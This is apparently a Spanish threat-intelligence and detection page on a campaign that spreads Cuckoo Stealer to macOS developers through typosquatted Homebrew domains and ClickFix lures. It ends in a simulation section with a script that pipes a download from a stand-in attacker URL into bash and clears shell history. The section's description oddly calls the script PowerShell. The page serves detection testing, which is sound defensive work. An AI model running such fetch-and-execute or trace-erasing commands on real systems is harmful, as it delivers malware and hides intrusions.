Falsos Homebrew Typosquats utilizados para entregar Cuckoo Stealer a través de ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe describe una campaña que abusa de dominios typosquatted de Homebrew para atraer a los desarrolladores de macOS a ejecutar comandos maliciosos de “instalación” a través de la técnica ClickFix. Un one-liner de curl diseñado envía a las víctimas a una infraestructura controlada por el atacante, entregando un cargador de recolección de credenciales seguido del infostealer Cuckoo Stealer. El malware persiste a través de un LaunchAgent, elimina los atributos de cuarentena y exfiltra credenciales y datos de monederos a través de HTTPS. La detección debe centrarse en los patrones del comando curl y la infraestructura asociada.
Investigación
Los investigadores rastrearon el señuelo inicial a homabrews.org, resolviendo en 5.255.123.244 en los Países Bajos y hospedando múltiples dominios similares (incluyendo raw.homabrews.org usado para entrega). El script descargado ejecuta un bucle de dscl authonly para validar las credenciales de macOS, luego recupera un binario llamado brew_agent. En la segunda etapa, Cuckoo Stealer crea un plist de LaunchAgent, elimina las banderas de cuarentena y se comunica con C2 usando intercambio de claves X25519 con cargas cifradas por XOR. La búsqueda de infraestructura descubrió una red de al menos seis dominios compartiendo la misma IP de hospedaje.
Mitigación
Educar a los desarrolladores para verificar las URLs de instalación de Homebrew y evitar copiar y pegar comandos no confiables en Terminal. Habilitar el registro de línea de comando y restringir los patrones donde curl descarga scripts remotos para su ejecución inmediata, especialmente los one-liners estilo “curl | sh”. La protección de endpoints debe alertar sobre la creación sospechosa de LaunchAgent y la eliminación de atributos de cuarentena. Las defensas de red deben bloquear los dominios maliciosos conocidos y marcar el tráfico a raw.homabrews.org y hosts relacionados.
Respuesta
Cuando se detecta un comando curl sospechoso, aislar el endpoint, capturar el script y binario brew_agent, y recolectar el plist de LaunchAgent para análisis. Restablecer las credenciales recolectadas y revocar los tokens comprometidos, especialmente para navegadores, Keychain y monederos de criptomonedas. Revisar forensemente el directorio oculto BrewUpdater, cualquier acceso directo creado y eliminar los archivos maliciosos. Actualizar las detecciones con los IOCs extraídos y monitorear la reutilización de la misma infraestructura.
Flujo de Ataque
Detecciones
Actividad Sospechosa de Keychain (via process_creation)
Ver
Modificación de Permisos de Archivo en Carpeta Tmp Sospechosa de MacOS (via cmdline)
Ver
Ubicaciones y Nombres de Plist Sospechosos en MacOS (via file_event)
Ver
Acceso Sospechoso a Credenciales Almacenadas del Navegador en MacOS (via process_creation)
Ver
El Volumen del Sistema MacOS fue Silenciado Usando Osascript (via cmdline)
Ver
Posible Recolección por Intento de Ejecución de Screencapture en MacOS (via cmdline)
Ver
Intento de Ejecución de Curl Sospechoso [MacOS] (via cmdline)
Ver
IOCs (HashSha256) para detectar: Typosquats Falsos de Homebrew Usados para Entregar Cuckoo Stealer vía ClickFix
Ver
IOCs (SourceIP) para detectar: Typosquats Falsos de Homebrew Usados para Entregar Cuckoo Stealer vía ClickFix
Ver
IOCs (DestinationIP) para detectar: Typosquats Falsos de Homebrew Usados para Entregar Cuckoo Stealer vía ClickFix
Ver
Detección del Comando de Instalación Malicioso en macOS vía ClickFix [Creación de Proceso en Linux]
Ver
Detección de Dominio de Typosquatting e IP Maliciosa en la Campaña ClickFix [Indicadores de Red]
Ver
Ejecución de Simulación
Requisito Previo: El Control de Prevuelo de Telemetría y Base debe haber pasado.
Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para desencadenar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán al mal diagnóstico.
-
Narrativa de Ataque y Comandos:
Un atacante ha obtenido un script malicioso codificado en PowerShell alojado en un servidor C2. Para evitar escribir archivos en el disco, el atacante transmite el script directamente a un shell Bash usandocurl -fsSLy la-cbandera. El comando se ejecuta interactivamente desde una cuenta de usuario comprometida, imitando un instalador legítimo de “click‑fix”. Los pasos son:- Resolver la URL de carga maliciosa (por ejemplo,
https://evil.example.com/payload.sh). - Canalizar la descarga a Bash, instruyendo a Bash que ejecute el contenido con
-c. - La carga realiza la recolección de credenciales, crea un archivo oculto y luego elimina el script temporal (cubriendo T1070.004).
- Resolver la URL de carga maliciosa (por ejemplo,
-
Script de Prueba de Regresión:
#!/usr/bin/env bash # ------------------------------------------------- # Simular instalador malicioso de macOS (estilo ClickFix) # ------------------------------------------------- set -euo pipefail MALICIOUS_URL="https://evil.example.com/payload.sh" # Transmitir la carga directamente a Bash con -c curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)" # Se asume que la carga realiza sus acciones maliciosas. # Para fines de la prueba simplemente imprimimos un marcador. echo "Carga maliciosa ejecutada" -
Comandos de Limpieza:
# Eliminar cualquier archivo que haya podido ser creado por la carga rm -f /tmp/payload.sh # Opcionalmente, borrar el historial de comandos para reducir huellas forenses history -c